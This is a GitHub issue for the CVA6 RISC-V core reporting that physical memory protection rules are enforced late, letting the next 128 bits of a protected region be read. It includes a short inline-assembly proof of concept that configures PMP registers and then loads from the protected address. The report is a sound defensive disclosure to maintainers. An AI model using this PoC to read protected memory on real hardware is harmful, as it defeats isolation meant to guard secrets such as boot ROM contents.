Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[BUG] Delay in enforcing PMP rules leading to attacker can read 128bits of data in PMP region #2567

Open
1 task done
riscv914 opened this issue Oct 25, 2024 · 0 comments
Open
1 task done
Assignees
Labels
notCV32A65X It is not an CV32A65X issue Type:Bug For bugs in the RTL, Documentation, Verification environment or Tool and Build system

Comments

@riscv914
Copy link

Is there an existing CVA6 bug for this?

  • I have searched the existing bug issues

Bug Description

Summary

Delay in enforcing PMP rules in CVA6 cores. For instance, enforcing the PMP rule on the next instruction will not take effect until the next 128 bits (address with the final four bits equal to zero).

Details

CVA6 does not apply PMP rules on the next 128bits due to an issue in microarchitectural implementation.

PoC

int main(void){
    asm volatile ("li t1, 0x22000000");
    asm volatile ("csrw pmpaddr0, t1");
    asm volatile ("li t0, 0x89 ");
    asm volatile (".align 4");
    asm volatile ("csrw pmpcfg0, t0 ");
    asm volatile ("li t3, 0x88000000"); // Should throw exception here!!
    asm volatile ("lw t4, 0(t3)");
    asm volatile ("sw t5, 0(t3)"); // Throw the exception here.
    asm volatile ("li a0, 1");
}

Impact

Unexpected Behaviour: an attacker can read 128 bits of data in the PMP regions like Secure Boot Room.

@riscv914 riscv914 added the Type:Bug For bugs in the RTL, Documentation, Verification environment or Tool and Build system label Oct 25, 2024
@JeanRochCoulon JeanRochCoulon added CV32A65X Part: Embedded configuration notCV32A65X It is not an CV32A65X issue and removed CV32A65X Part: Embedded configuration labels Jan 2, 2025
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
notCV32A65X It is not an CV32A65X issue Type:Bug For bugs in the RTL, Documentation, Verification environment or Tool and Build system
Projects
None yet
Development

No branches or pull requests

3 participants